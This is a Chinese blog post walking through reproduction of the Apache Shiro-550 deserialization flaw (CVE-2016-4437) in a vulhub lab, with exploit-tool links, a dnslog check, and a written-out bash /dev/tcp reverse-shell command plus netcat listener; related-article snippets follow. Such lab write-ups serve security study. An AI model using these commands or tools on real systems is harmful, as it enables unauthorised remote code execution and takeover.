2. 程式人生 > 實用技巧 >滲透測試--shiro-550漏洞復現(CVE-2016-4437)

滲透測試--shiro-550漏洞復現(CVE-2016-4437)

阿新 發佈:2020-10-22

漏洞概述

Apache Shiro 1.2.4及以前版本中,加密的使用者資訊序列化後儲存在名為remember-me的Cookie中。攻擊者可以使用Shiro的預設金鑰偽造使用者Cookie,觸發Java反序列化漏洞,進而在目標機器上執行任意命令。

影響範圍

Apache Shiro版本<=1.2.4

參考手冊:

https://www.pythonheidong.com/blog/article/277786/ https://www.cnblogs.com/paperpen/p/11312671.html https://github.com/feihong-cs/ShiroExploit https://github.com/feihong-cs/Java-Rce-Echo
http://www.vuln.cn/6295 https://vulhub.org/ https://blog.csdn.net/insightglacier/article/details/105030035?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param
https://blog.csdn.net/insightglacier/article/details/105030035 https://blog.csdn.net/weixin_38307489/article/details/102455710 https://www.zhaosimeng.cn/ldbk/131.html https://xz.aliyun.com/t/7950 https://blog.csdn.net/qq_23936389/article/details/107148893
  • 利用鏈詳解
https://www.anquanke.com/post/id/190468
  • 工具
https://github.com/wyzxxz/shiro_rce
https://github.com/zhzyker/exphub

漏洞復現(當對漏洞瞭解一定原理後,以最快的方式復現)

一.使用vulhub起shiro對應環境(搭建環境可以看我上一篇vulhub搭建步驟

(1)

(2)進入CVE-2016-4437 目錄

(3)執行 docker-compose up -d (初次執行需要載入一系列檔案)

(4)docker ps 檢視對應的埠

(5)輸入虛擬機器的ip地址+埠

xxxx.xxx.xxx.xxx:8080

(6)https://github.com/wyzxxz/shiro_rce下載shiro_rce工具包

(7)解壓出來後執行工具

java -jar shiro_tool.jar https://xx.xx.xx.xx

(8)工具開啟成功,執行命令

這裡輸入對應的dnslog地址

dnslog也可以稱之為dns帶外查詢,是一種注入姿勢,可以通過查詢相應的dns解析記錄,來獲取我們想要的資料

這裡提供一個線上生產的第三方平臺

http://www.dnslog.cn/

點選get subdomain 獲取對應的地址

輸入完成後 ,enter確認命令,再點選Refresh Record,可以看到對應的解析記錄

(9)再開一臺虛擬機器,用來執行反彈shell,也就是說A是我們的vulhub搭起來環境的虛擬機器,B是我們控制A的虛擬機器,下面XX輸入B的IP地址,8080為對應的監聽埠

但是如果A在Linux系統中 這段程式碼需要base64加密,而WIN不用加密,目前我也正在研究原因是什麼,知道的大佬可以下面評論幫助一下

這裡提供一下base64加密的線上網址:http://www.jackson-t.ca/runtime-exec-payloads.html

 輸入以下命令:bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1
 base64加密後的結果為

然後再另一臺虛擬機器B 開啟監聽埠 8080

命令為:nc -l 8080

然後回到工具命令列:輸入加密後base64命令:

最後回到虛擬機器 B 會看到以下結果:

成功拿到反彈shell

這時候輸入命令 檢視受害機A的Docker容器下的檔案

相關推薦

滲透測試--shiro-550漏洞復現CVE-2016-4437

漏洞概述 Apache Shiro 1.2.4及以前版本中,加密的使用者資訊序列化後儲存在名為remember-me的Cookie中。攻擊者可以使用Shiro的預設金鑰偽造使用者Cookie,觸發Java反序列化漏洞,進而在目標機器上執行任意命令。

Apache Shiro反序列化漏洞復現CVE-2016-4437

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

漏洞復現 - Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

Apache Dubbo Provider預設反序列漏洞復現CVE-2020-1948

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Jenkins-CI 遠端程式碼執行漏洞復現CVE-2017-1000353

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

Django GIS SQL注入漏洞復現CVE-2020-9402

漏洞概述: Django是Django基金會的一套基於Python語言的開源Web應用框架。該框架包括面向物件的對映器、檢視系統、模板系統等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x

vulhub漏洞復現-Django JSONField SQL注入漏洞復現 CVE-2019-14234

Django JSONField SQL注入漏洞復現 CVE-2019-14234 漏洞概述: Django通常搭配postgresql資料庫,而JSONField是該資料庫的一種資料型別。該漏洞的出現的原因在於Django中JSONField類的實現,Django的mode

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

docker逃逸漏洞復現CVE-2019-5736

漏洞概述 2019年2月11日,runC的維護團隊報告了一個新發現的漏洞,SUSE Linux GmbH高階軟體工程師Aleksa Sarai公佈了影響Docker, containerd, Podman, CRI-O等預設執行時容器runc的嚴重漏洞CVE-2019-5736。漏洞會對

Apache log4j2-RCE 漏洞復現CVE-2021-44228

Apache log4j2-RCE 漏洞復現 0x01 漏洞簡介 Apache Log4j2是一個基於Java的日誌記錄工具。由於Apache Log4j2某些功能存在遞迴解析功能,攻擊者可直接構造惡意請求,觸發遠端程式碼執行漏洞漏洞利用無需特殊配置,

Apache Log4j2 lookup JNDI 注入漏洞復現CVE-2021-44228

今年的末尾水一篇部落格 漏洞簡介 Apache Log4j 2 是Java語言的日誌處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日誌內容的情況下,通過傳入類似於${jndi:ldap://evil

Linux Polkit本地許可權提升漏洞復現CVE-2021-4034

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

S2-062_RCE漏洞復現CVE-2021-31805

一、漏洞描述 該漏洞是由於對S2-061(CVE-2020-17530的修復不完整,在Apache Struts 2.0.0-2.5.29版本範圍內,如果開發人員使用 %{xxx} 語法進行強制OGNL解析時,標籤的某些屬性仍然可被二次解析。當解析未經驗證的

漏洞復現:ActiveMQ任意檔案寫入漏洞CVE-2016-3088

一、漏洞描述 該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許使用者通過HTTP PUT方法上傳檔案到指定目錄。Fileserver支援寫入檔案(不解析jsp),但是支援移動檔案(Move)我們可以將jsp的檔案PU

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現第五彈

棄之可惜 0x00 漏洞概述 編號為CVE-2012-0392。 即S2-008,實際上是多個漏洞的集合。

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

Apache Struts 2遠端程式碼執行漏洞復現第三彈

Double Kill 0x00 漏洞概述 編號為CVE-2017-5638。 官方描述是: It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn\'t valid an exception is th